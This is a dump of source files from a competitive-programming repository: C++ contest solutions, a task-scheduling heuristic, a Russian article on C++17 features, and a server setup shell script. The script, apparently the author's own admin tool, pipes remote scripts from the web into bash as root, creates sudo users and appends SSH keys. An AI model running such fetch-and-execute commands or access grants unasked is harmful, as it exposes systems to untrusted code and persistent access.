\n//rng\nmt19937 rng(chrono::steady_clock::now().time_since_epoch().count());\n \n//}}}\n \nint ROUND_UP(int x, int y) // {{{\n{\n return (x + y - 1) / y;\n}\n \nint NON_TOP_MACHINE = 1;\nint NON_TOP_DISK = 1;\nstruct task;\nstruct disk;\nstruct machine;\n \nstruct machine\n{\n int id;\n int p;\n int t = 0;\n \n int get(int sz)\n {\n return ROUND_UP(sz, p);\n }\n \n machine() {}\n};\n \nistream& operator>>(istream& is, machine& m) {\n is >> m.id >> m.p; --m.id;\n return is;\n}\n \nstruct disk\n{\n int id;\n int s;\n int c;\n int used = 0;\n \n int get(int dt)\n {\n return ROUND_UP(dt, s);\n }\n \n disk() {}\n};\n \nistream& operator>>(istream& is, disk& d) {\n is >> d.id >> d.s >> d.c; --d.id;\n return is;\n}\n \ntypedef bitset<10001> bs;\n \nstruct task\n{\n int id;\n int sz;\n int dt;\n int importance = 1;\n int ind = 0;\n \n vector<int> availableMachines;\n \n vector<int> gData;\n vector<int> gTask;\n vector<int> g;\n vector<int> rev;\n bs r;\n \n vector<int> rData;\n vector<int> rTask;\n \n int x = -1;\n int y = -1;\n int z = -1;\n \n int a = -1;\n int b = -1;\n int c = -1;\n int d = -1;\n \n int getDataRead();\n \n void assign(int x, int y, int z);\n \n task() {}\n \n bool operator<(const task& other) const \n {\n return importance < other.importance;\n //return sz > other.sz;\n //return tuple(-sz, -importance) < tuple(-other.sz, -other.importance);\n }\n};\n \nistream& operator>>(istream& is, task& t) {\n int nn, x;\n is >> t.id >> t.sz >> t.dt >> nn; --t.id;\n fori(nn)\n {\n is >> x; --x;\n t.availableMachines.pb(x);\n }\n return is;\n}\n \nostream& operator<<(ostream& os, const task& t) {\n os << t.id + 1 << \" \" << t.x << \" \" << t.y + 1 << \" \" << t.z + 1;\n //os << \"Task: [\" << t.id << \" \" << t.sz << \" \" << t.dt << \" \" << t.gData.size() << \" \" << t.gTask.size() << \" \" << t.availableMachines.size() << \"]\";\n return os;\n} // }}}\n \nint c = 4;\n \nvoid shuffleOrder(vector<int>& order, int S)\n{\n int n = SZ(order);\n for (int i = 0; i < n; )\n {\n int step = S;\n shuffle(order.begin() + i, order.begin() + min(n, i + step), rng);\n i += S;\n }\n}\n \nvoid sortOrder(const vector<task>& edges, vector<int>& order, int step)\n{\n function<bool(int, int)> f = [&](const int& a, const int& b) {\n return edges[a] < edges[b];\n };\n //int test = rng() % c;\n //if (test % c == 0)\n //{\n //f = [&](const int& a, const int& b) {\n //return tuple(edges[a].sz, edges[a].importance) > tuple(edges[b].sz, edges[b].importance);\n //};\n //}\n //else if (test % c == 1)\n //{\n //f = [&](const int& a, const int& b) {\n //return tuple(edges[a].importance, edges[a].sz) > tuple(edges[b].importance, edges[b].sz);\n //};\n //}\n //else if (test % c == 2)\n //{\n //f = [&](const int& a, const int& b) {\n //return tuple(edges[a].importance, -edges[a].sz) > tuple(edges[b].importance, -edges[b].sz);\n //};\n //}\n //else if (test % c == 3)\n //{\n //f = [&](const int& a, const int& b) {\n //return tuple(edges[a].importance) > tuple(edges[b].importance);\n //};\n //}\n sort(all(order), f);\n shuffleOrder(order, step);\n}\n \n//topsort\n//Returns empty vector if cycle is found\nvi topsort(vector<int>& order, vector<task>& edges, int msz, int step, bool reversed = false)\n{\n int n = edges.size();\n vector<int> ans;\n vector<int> used(n, 0);\n \n if (order.size() == 0)\n {\n order.resize(n);\n iota(all(order), 0);\n sortOrder(edges, order, step);\n //if (test % c <= 1)\n //if (rng() % 20 == 0)\n //{\n //vector<int> order2;\n //int C = n / msz;\n //for (int i = 0; i < C; i++)\n //for (int j = i; j < n; j += C)\n //order2.pb(order[j]);\n //order = order2;\n //}\n }\n else\n shuffleOrder(order, step);\n \n if (rng() % 2)\n {\n queue<int> q;\n for (int i: order)\n if (edges[i].ind == 0)\n q.push(i);\n\n while (!q.empty())\n {\n int u = q.front();\n q.pop();\n ans.pb(u);\n used[u] = 1;\n //sortOrder(edges, edges[u].g, step);\n for (const int& v: edges[u].g)\n if (--edges[v].ind == 0)\n q.push(v);\n }\n if (reversed)\n reverse(ans.begin(), ans.end());\n }\n else \n {\n auto dfs = [&](auto dfs, int u) -> void {\n used[u] = 1;\n //sortOrder(edges, edges[u].g, step);\n for (const int& v: edges[u].g)\n if (!used[v])\n dfs(dfs, v);\n used[u] = 2;\n ans.pb(u);\n };\n \n for (int i: order)\n if (!used[i])\n dfs(dfs, i);\n if (!reversed)\n reverse(ans.begin(), ans.end());\n }\n return ans;\n}\n \nvector<disk> disks; // {{{\nvector<machine> machines;\nvector<task> tasks;\n \nint task::getDataRead()\n{\n return disks[z].get(dt);\n}\n \nvoid task::assign(int x, int y, int z)\n{\n this->x = x;\n this->y = y;\n this->z = z;\n \n a = x;\n b = a;\n for (int pred: gData)\n b += tasks[pred].getDataRead();\n c = b + machines[y].get(sz);\n d = c + disks[z].get(dt);\n \n machines[y].t = d;\n disks[z].used += dt;\n}\n \nvoid reset()\n{\n for (auto& t: tasks)\n {\n t.x = t.y = t.z = t.a = t.b = t.c = t.d = 0;\n shuffle(all(t.gData), rng);\n shuffle(all(t.gTask), rng);\n shuffle(all(t.rData), rng);\n shuffle(all(t.rTask), rng);\n shuffle(all(t.rev), rng);\n shuffle(all(t.g), rng);\n t.ind = SZ(t.rev);\n }\n for (auto& d: disks)\n d.used = 0;\n for (auto& m: machines)\n m.t = 0; \n} // }}}\n \nauto run(vector<int>& order) // {{{\n{\n reset();\n for (int tt: order)\n {\n task& t = tasks[tt];\n int time = 0;\n for (int dd: t.gData)\n umax(time, tasks[dd].d);\n \n int e = MOD;\n int x;\n int y;\n int ee = MOD;\n int xx;\n int yy;\n for (int M: t.availableMachines)\n {\n auto& m = machines[M];\n int start = max(time, m.t);\n for (int dt: t.gTask)\n umax(start, m.id == tasks[dt].y ? tasks[dt].d : tasks[dt].c);\n \n int cur = start + m.get(t.sz);\n if (cur < e)\n ee = e,\n xx = x,\n yy = y,\n e = cur,\n x = start,\n y = m.id;\n }\n int trash = 3;\n if (ee != MOD && t.importance < trash && rng() % 2)\n e = ee,\n x = xx,\n y = yy;\n \n int eee = MOD;\n int z;\n\n int eeee = MOD;\n int zz;\n for (auto& d: disks)\n if (d.used + t.dt <= d.c)\n {\n int cur = e + d.get(t.dt);\n if (cur < eee)\n eeee = eee,\n zz = z,\n eee = cur,\n z = d.id;\n }\n\n if (eeee != MOD && t.importance < trash && rng() % 2)\n z = zz;\n\n t.assign(x, y, z);\n }\n return tasks;\n} // }}}\n \nint main()\n{\n//{{{\n ios_base::sync_with_stdio(false); cin.tie(0);\n ints(l);\n tasks.resize(l);\n readln(tasks);\n ints(n);\n machines.resize(n);\n readln(machines);\n ints(m);\n disks.resize(m);\n readln(disks);\n ints(dd);\n fori(dd)\n {\n ints(u, v); --u; --v;\n tasks[v].gData.pb(u);\n tasks[u].rData.pb(v);\n }\n ints(td);\n fori(td)\n {\n ints(u, v); --u; --v;\n tasks[v].gTask.pb(u);\n tasks[u].rTask.pb(v);\n }\n \n sort(all(tasks), [&](const auto& a, const auto& b) { return a.id < b.id; });\n sort(all(disks), [&](const auto& a, const auto& b) { return a.id < b.id; });\n sort(all(machines), [&](const auto& a, const auto& b) { return a.id < b.id; });\n \n for (auto& t: tasks)\n {\n t.g.insert(t.g.end(), all(t.gData));\n t.g.insert(t.g.end(), all(t.gTask));\n sort(all(t.g));\n t.g.resize(unique(all(t.g)) - t.g.begin());\n\n t.rev.insert(t.rev.end(), all(t.rData));\n t.rev.insert(t.rev.end(), all(t.rTask));\n sort(all(t.rev));\n t.rev.resize(unique(all(t.rev)) - t.rev.begin());\n\n if (t.sz > 500)\n {\n vector<pii> temp;\n for (int M: t.availableMachines)\n temp.pb({-machines[M].p, M});\n sort(all(temp));\n while (temp.size() > 1 && -temp.back().first < 10)\n temp.pop_back();\n vector<int> nxt;\n for (auto& [_, M]: temp)\n nxt.pb(M);\n t.availableMachines = nxt;\n }\n t.ind = SZ(t.rev);\n }\n vector<int> o;\n auto order = topsort(o, tasks, machines.size(), 1);\n reset();\n for (int tt: order)\n {\n task& t = tasks[tt];\n for (int dep: t.rData)\n {\n t.r[dep] = true;\n t.r |= tasks[dep].r;\n }\n \n for (int dep: t.rTask)\n {\n t.r[dep] = true;\n t.r |= tasks[dep].r;\n }\n \n t.importance = t.r.count();\n }\n \n auto start = clock();\n // }}}\n#ifdef ONLINE_JUDGE\n auto TL = 14.6;\n#else\n auto TL = 3.;\n#endif\n auto makespan = MOD;\n vector<task> answer;\n vector<vector<int>> current;\n int test = 0;\n while ((clock() - start + 0.0) / CLOCKS_PER_SEC < TL)\n //while ((clock() - start + 0.0) / CLOCKS_PER_SEC < TL)\n {\n //if (test % 2 == 0)\n //{\n o.clear();\n o.resize(0);\n //}\n //run(1);\n int step = rng() % 77 + 1;\n auto ans = topsort(o, tasks, machines.size(), step, true);\n run(ans);\n int cur = 0;\n for (auto& t: tasks)\n umax(cur, t.d);\n if (cur < makespan)\n makespan = cur,\n current.pb(o),\n answer = vector<task>(all(tasks));\n ++test;\n }\n if (false) {\n reverse(all(current));\n current.resize(min(SZ(current), 10));\n int test2 = 0;\n while ((clock() - start + 0.0) / CLOCKS_PER_SEC < TL)\n {\n int step = rng() % 100 + 1;\n int index = rng() % SZ(current);\n auto ttt = current[index];\n auto ans = topsort(ttt, tasks, machines.size(), step, true);\n run(ans);\n int cur = 0;\n for (auto& t: tasks)\n umax(cur, t.d);\n if (cur < makespan)\n makespan = cur,\n current[index] = ttt,\n answer = vector<task>(all(tasks));\n ++test2;\n }\n }\n writeln(answer);\n cerr << makespan << \" \" << test << endl;\n return 0;\n}\n \n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.5226514935493469, "alphanum_fraction": 0.5306922793388367, "avg_line_length": 26.711956024169922, "blob_id": "6f8b923ebda4f34c9364f23a5b989dc52d41b338", "content_id": "8f2a1759fc5c5bf304880cb1fee8a145a5a44748", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 5099, "license_type": "no_license", "max_line_length": 169, "num_lines": 184, "path": "/scripts/adduser.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\n\nsource /etc/os-release\n\nensureCommandExists () {\n pack=$2\n if [ ! \"$pack\" ]; then\n pack=$1\n fi\n\n echo \"Installing $1...\"\n if ! [ -x \"$(command -v $1)\" ]; then\n $installer $pack\n else\n echo \"Found $1\"\n fi\n}\n\nif [ $EUID -ne 0 ]; then\n echo \"Only root can run this script\"\n exit 1\nfi\n\nif [ -x \"$(command -v pacman)\" ]; then\n installer=\"pacman -Sy --noconfirm\"\n isArch=\"isArch\"\nelse\n installer=\"apt-get install -y\"\nfi\n\nfunction usage {\n cat << END\nusage: adduser.sh\n -u | --user <username>\n -p | --password <password>\n -s | --server <server_name>\n -k | --sshkey <sshkey>\n -n | --node\n -d | --docker\n -h | --help\n -f | --force\nEND\n exit 0\n}\n\nOPTS=`getopt -o hfndmu:p:s:k: -l help,force,node,docker,minimal,username:,password:,server:,sshkey:,packages -- \"$@\"`\nif [ $? != 0 ]; then exit 1; fi\neval set -- \"$OPTS\"\n\n#parsing arguments\nwhile true ; do\n case \"$1\" in\n -h | --help ) usage ;shift;;\n -f | --force ) force=true ;shift;;\n -n | --node ) needsNode=true ;shift;;\n -d | --docker ) needsDocker=true ;shift;;\n -m | --minimal ) minimal=true ;shift;;\n\n -u | --username ) user=$2 ;shift 2;;\n -p | --password ) password=$2 ;shift 2;;\n -s | --server ) server=$2 ;shift 2;;\n -k | --sshkey ) sshkey=$2 ;shift 2;;\n --packages ) packages=$2 ;shift 2;;\n\n -- ) shift; break;;\n esac\ndone\n\necho \"Installer: $installer\"\n\nif [ \"$server\" ]; then\n server=\"$server: \"\nelse\n server=\"$HOSTNAME: \"\nfi\n\nensureCommandExists \"curl\"\n\nif [ \"$packages\" ]; then\n for package in \"$packages\"; do\n $installer $package\n done\nfi\n\nif [ \"$minimal\" ]; then\n ensureCommandExists \"zsh\"\n ensureCommandExists \"sudo\"\n ensureCommandExists \"vim\"\n ensureCommandExists \"git\"\n ensureCommandExists \"htop\"\n ensureCommandExists \"ifconfig\" \"net-tools\"\nfi\n\nif [ ! `getent group sudo 2>/dev/null` ]; then\n echo \"Creating group sudo...\"\n groupadd sudo\n sed -i.bak \"s/\\# %sudo/%sudo/g\" /etc/sudoers\nfi\n\nif [ \"$user\" ]; then\n home=\"/home/$user\"\n if [ \"$user\" == \"root\" ]; then\n home=\"/root\"\n fi\n\n if [ ! `getent passwd $user 2>/dev/null` ]; then\n ensureCommandExists \"zsh\"\n if [ \"$password\" ]; then\n echo \"Creating user '$user' with password '$password'...\"\n useradd -m -g sudo -p $(openssl passwd -1 $password) -s `which zsh` $user\n else\n echo \"Creating user '$user'...\"\n useradd -m -g sudo -s `which zsh` $user\n fi\n else\n chsh -s `which zsh` $user\n usermod -aG sudo $user\n fi\n\n zshrc=\"$home/.zshrc\"\n if [ ! -f $zshrc ] || [ \"$force\" ]; then\n echo \"Downloading .zshrc (Prompt: '$server')...\"\n curl https://raw.githubusercontent.com/Igorjan94/x/master/.zshrcMinimal 2>/dev/null | sed \"s/Server 79: /$server/g\" | sed \"s:/usr/bin/vim:`which vim`:g\" > $zshrc\n echo \"alias sudo='sudo -S'\" >> $zshrc\n echo \"alias magic='curl \\\"https://igorjan94.ru/adduser.sh\\\" 2&>/dev/null | bash -s -- '\" >> $zshrc\n fi\n\n if [ \"$sshkey\" ]; then\n echo \"Appending ssh key to authorized_keys...\"\n mkdir -p \"$home/.ssh\"\n keys_file=\"$home/.ssh/authorized_keys\"\n if [ ! -f $keys_file ]; then\n touch \"$keys_file\"\n fi\n echo \"$sshkey\" >> \"$keys_file\"\n fi\nfi\n\n#node\nif [ \"$needsNode\" ]; then\n echo \"Installing nodejs...\"\n if ! [ -x \"$(command -v node)\" ]; then\n if [ \"$isArch\" ]; then\n pacman -Sy --noconfirm nodejs npm\n else\n curl -sL https://deb.nodesource.com/setup_14.x | sudo -E bash -\n apt-get install -y nodejs\n fi\n else\n echo \"Found node\"\n fi\nfi\n\n#docker\nif [ \"$needsDocker\" ]; then\n echo \"Installing docker...\"\n if ! [ -x \"$(command -v docker)\" ]; then\n if [ \"$isArch\" ]; then\n pacman -Sy --noconfirm docker docker-compose\n else\n apt-get update\n apt-get install -y apt-transport-https ca-certificates curl gnupg2 software-properties-common\n curl -fsSL https://download.docker.com/linux/$ID/gpg | apt-key add -\n add-apt-repository \\\n \"deb [arch=amd64] https://download.docker.com/linux/$ID \\\n $(lsb_release -cs) \\\n stable\"\n apt-get update\n apt-get install -y docker-ce\n curl -L https://github.com/docker/compose/releases/download/1.24.1/docker-compose-`uname -s`-`uname -m` -o /usr/local/bin/docker-compose\n chmod +x /usr/local/bin/docker-compose\n fi\n if [ \"$user\" ]; then\n echo \"Adding user '$user' in docker group...\"\n usermod -aG docker \"$user\"\n fi \n\n echo \"Starting and enabling daemon...\"\n systemctl start docker\n systemctl enable docker\n else\n echo \"Found docker\"\n fi\nfi\n" }, { "alpha_fraction": 0.347457617521286, "alphanum_fraction": 0.3910411596298218, "avg_line_length": 20, "blob_id": "8955b5a91f6f0841fc8135b635b02b748db21bf9", "content_id": "9cc309e2511380299bd49aedd099d86f6ef132e7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2478, "license_type": "no_license", "max_line_length": 109, "num_lines": 118, "path": "/2013/2013FBHC/count.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <algorithm>\n#include <cstdlib>\n#include <string>\n#include <iostream>\n#include <cstdio>\n#include <vector>\n#include <iterator>\n#include <queue>\n\nusing namespace std;\n\nint n, k, l, classes;\nvector<int> s(400001), c(400001), c1(400001), head(400001), a(400001), a1(400001), temp(400001), a_1(400002);\n\ntemplate <class T>\nvoid writeln(vector<T> &a)\n{\n for (int i = 0; i < n; i++)\n printf(\"%d \", a[i]);\n// copy(a.begin(), a.end(), ostream_iterator<T>(cout, \" \"));\n printf(\"\\n\");\n}\n\nvoid read()\n{\n int i = 0;\n char d;\n while (true)\n {\n scanf(\"%c\", &d);\n if (d == '\\n')\n break;\n s[i] = d - 'a' + 1;\n a[i] = i++;\n }\n s[i] = 0;\n a[i] = i++;\n n = i;\n}\n\nvoid radix(vector<int> &a)\n{\n for (int i = 0; i < n; i++)\n head[s[a[i]] + 1]++;\n head[0] = 0;\n for (int i = 1; i < 28; i++)\n head[i] += head[i - 1];\n for (int i = 0; i < n; i++)\n temp[head[s[a[i]]]++] = a[i];\n c[a[0]] = 0;\n classes = 1;\n a = temp;\n for (int i = 1; i < n; i++)\n {\n if (s[a[i]] != s[a[i - 1]])\n classes++;\n c[a[i]] = classes - 1;\n }\n}\n\nvoid suffix_array(vector<int> &s)\n{\n /*c.resize(n);\n head.resize(n);\n a.resize(n);\n a1.resize(n);\n c1.resize(n);\n temp.resize(n);*/\n radix(a);\n for (int l = 1; l < n; l *= 2)\n {\n head.clear();\n head.resize(classes, 0);\n for (int i = 0; i < n; i++)\n head[c[a1[i] = (a[i] - l + n) % n]]++;\n for (int i = 1; i < classes; i++)\n head[i] += head[i - 1];\n for (int i = n - 1; i >= 0; i--)\n a[--head[c[a1[i]]]] = a1[i];\n classes = 1;\n c1[a[0]] = 0;\n for (int i = 1; i < n; i++)\n {\n if (c[a[i]] != c[a[i - 1]] || c[(a[i] + l) % n] != c[(a[i - 1] + l) % n])\n classes++;\n c1[a[i]] = classes - 1;\n }\n c = c1;\n }\n}\n\nint main()\n{\n// freopen(\"count.out\", \"w+\", stdout);\n // freopen(\"count.in\", \"r\", stdin);\n read();\n if (n == 2)\n {\n printf(\"1\\n\");\n return 0;\n }\n suffix_array(s);\n int z = 0;\n long long ans = 0;\n for (int i = 0; i < n; i++)\n a_1[a[i]] = i;\n int i;\n for (int j = 0; j < n; j++)\n {\n i = a_1[j];\n for (;s[a[i] + z] == s[a[(i + 1) % n] + z]; z++);\n ans = ans + n - 1 - a[i] - z;\n if (z > 0)\n z--;\n }\n printf(\"%I64d\\n\", ans);\n return 0;\n}\n" }, { "alpha_fraction": 0.45205992460250854, "alphanum_fraction": 0.4599250853061676, "avg_line_length": 30.41176414489746, "blob_id": "109400c6af8242d7c7ccc26b3ba2ceb76b93fff6", "content_id": "953a1f9e78a05e1633eb1bb3f394db31cc3c0cee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2670, "license_type": "no_license", "max_line_length": 928, "num_lines": 85, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.09.24/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <map>\n#include <queue>\n#define enter printf(\"\\n\");\n#define pb push_back\n\nusing namespace std;\nint INF = 1000000007;\nvector< vector<int> > a;\nvector<int> used;\nstring FILENAME = \"homo\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nvoid run()\n{\n int n;\n readln(n);\n multimap<int, int> q;\n set<int> s;\n char c, d;\n int f = 0;\n int x;\n multimap<int, int>::iterator it;\n for (int i = 0; i < n; i++)\n {\n scanf(\"%c%c%c%c%c%c%c%d\\n\", &c, &c, &c, &c, &c, &c, &d, &x);\n if (c == 't')\n {\n s.insert(x);\n if (q.count(x) == 1)\n f++;\n q.insert(make_pair(x, i));\n }\n else\n {\n int t = q.count(x);\n if (t == 1)\n s.erase(x);\n if (t == 2)\n f--;\n it = q.find(x);\n if (it != q.end())\n q.erase(it);\n }\n //printf(\"%d %d \", q.size(), s.size());\n if (q.size() <= 1)\n printf(\"neither\\n\"); else\n if (f && s.size() > 1)\n printf(\"both\\n\"); else\n if (f)\n printf(\"homo\\n\"); else\n printf(\"hetero\\n\");\n }\n}\n\nint main()\n{\n freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.43383297324180603, "alphanum_fraction": 0.4471092224121094, "avg_line_length": 30.554054260253906, "blob_id": "87e5586a21513dcb8d0d914567673b71d02c6d22", "content_id": "6293edf5f0db58b8c34805877f3dbdadbb7bd9fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2335, "license_type": "no_license", "max_line_length": 928, "num_lines": 74, "path": "/CodeForce/0316/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <string>\n#define enter printf(\"\\n\");\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> a, b, c;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nint main()\n{\n //freopen(\"input.txt\", \"r\", stdin);\n char c;\n int ans = 0;\n long long ss = 1;\n bool flag = false, flag2 = false;\n set<char> s;\n while (true)\n {\n scanf(\"%c\", &c);\n if (c == '\\n')\n break;\n else\n if (c >= '0' && c <= '9')\n flag2 = true;\n else\n if (c == '?')\n {\n if (!flag2)\n ss *= 9; else\n ans++;\n }\n else\n {\n s.insert(c);\n if (!flag2)\n flag = true;\n }\n flag2 = true;\n }\n //printf(\"%d\\n\", s.size());\n for (int i = 0; i < s.size() - flag; i++)\n ss *= (10 - i - flag);\n if (flag)\n ss *= 9;\n cout << ss;\n// printf(\"1\");\n //ans += s.size();\n for (int i = 0; i < ans; i++)\n printf(\"0\");\n printf(\"\\n\");\n return 0;\n}\n" }, { "alpha_fraction": 0.36503496766090393, "alphanum_fraction": 0.39580419659614563, "avg_line_length": 18.351350784301758, "blob_id": "9bc58abb73dbfd69b79032626f6ffb8fcca5a073", "content_id": "2b22e439dca7267a691ef14f4c553476f0875dd5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 715, "license_type": "no_license", "max_line_length": 75, "num_lines": 37, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.11/E.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdio>\n#include <vector>\n#include <iostream>\n \nusing namespace std;\n \nstring s1, s2, t1, t2;\nbool used[3000];\nvoid run()\n{\n cin >> s1 >> s2 >> t1 >> t2;\n int n = s1.size();\n for (int i = 0; i < n; ++i){\n char ch = s1[i];\n bool f = false;\n for (int j = 0; j < n; ++j){\n if (t1[j] == ch && s2[n - i - 1] == t2[n - j - 1] && !used[j]){\n f = true;\n used[j] = true;\n break;\n }\n }\n if (!f){\n cout << \"No\";\n return;\n }\n }\n cout << \"Yes\";\n}\n \nint main()\n{\n freopen(\"enchanted.in\", \"r\", stdin);\n freopen(\"enchanted.out\", \"w\", stdout);\n run();\n return 0;\n}" }, { "alpha_fraction": 0.5799015164375305, "alphanum_fraction": 0.6090328097343445, "avg_line_length": 21.935096740722656, "blob_id": "5e5a9b29dd7e3c559fe8caed61c55bb58ba1e0ce", "content_id": "97aab2154ed733cffcb802310ae902bb5e57e0e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 12297, "license_type": "no_license", "max_line_length": 277, "num_lines": 416, "path": "/CodeForce/cpp17tricks/cpp17rus.md", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "C++17 уже [доступен](http://codeforces.com/blog/entry/57646) на codeforces, сообщество [хочет](http://codeforces.com/blog/entry/15643?#comment-413401) новую версию [C++ tricks](http://codeforces.com/blog/entry/15643), которую написал [user:Swift,2018-02-13], так что, начнем! \nDisclaimer: Я сделал всего лишь немного примеров новых фич, которые по моему мнению относятся к спортивному программированию. Если у Вас есть примеры лучше или Вам что-то непонятно, или нужно больше объяснений каких-то фич $---$ пишите в комментах)\n\n### Fold expressions (Свертки)\n\n* Я думаю все знают, что такое reduce и свертка, но все-таки приведу пример из c++11:\n\n```\nvector<int> v = {1, 3, 5, 7};\nint res = accumulate(v.begin(), v.end(), 0, [](int a, int b) { return a + b; });\ncout << res; // 16\n```\n\n* Начиная с C++17 есть поддержка свертки для шаблонного списка со следующим синтаксисом:\n\n```\n(pack op ...)\n(... op pack)\n(pack op ... op init)\n(init op ... op pack)\n```\n\n* Для примера напишем функцию, которая принимает переменное число аргументов и считает их сумму.\n\n[cut]\n\nДо С++17 мы не могли этого сделать без явной передачи первого аргумента:\n\n```\n//C++14\nauto Sum()\n{\n return 0;\n}\n\ntemplate<typename Arg, typename... Args>\nauto Sum(Arg first, Args... rest)\n{\n return first + Sum(rest...);\n}\n\ncout << Sum(1, 2, 3, 4, 5); // 15\n```\n\n```\n//C++17\ntemplate<typename... Args>\nauto Func(Args... args)\n{\n return (args + ...);\n}\n\ncout << Func(1, 2, 3, 4, 5); // 15\n```\n\n* Это особенно полезно, когда мы в качестве `op` используем запятую:\n\n```\n// C++17\ntemplate<typename T, typename... Args>\nvoid pushToVector(vector<T>& v, Args&&... args)\n{\n (v.push_back(forward<Args>(args)), ...);\n //Этот код раскрывается в последовательность выражений через запятую:\n // v.push_back(forward<Args_1>(arg1)),\n // v.push_back(forward<Args_2>(arg2)),\n // ....\n}\n\nvector<int> v;\npushToVector(v, 1, 4, 5, 8);\n```\n\n* И мой любимый пример:\n\n```\n//C++17\ntemplate<typename... Args>\nvoid readln(Args&... args)\n{\n ((cin >> args), ...);\n}\n\ntemplate<typename... Args>\nvoid writeln(Args... args)\n{\n ((cout << args << \" \"), ...);\n}\n\nint x;\ndouble y;\nreadln(x, y); // enter 100 500.1234\nwriteln(x, \"some string\", y); // 100 some string 500.1234\n```\n\n* **Note**: скобки значимы!\n\n### Class template argument deduction (Вывод шаблонных типов)\n\n```\ntemplate<typename T>\nstruct point\n{\n T x;\n T y;\n point(T x, T y) : x(x), y(y) {}\n};\n\n//C++11\npair<int, double> p1 = {14, 17.0}\npoint<int> u = {1, 2};\n\n//C++17\npair p2 = {14, 17.0}\npoint v = {1, 2};\n```\n\nЕсли структура сложная, то есть возможность указать правило вывода самим, например так:\n\n```\ntemplate<typename T, typename U>\nstruct S\n{\n T first;\n U 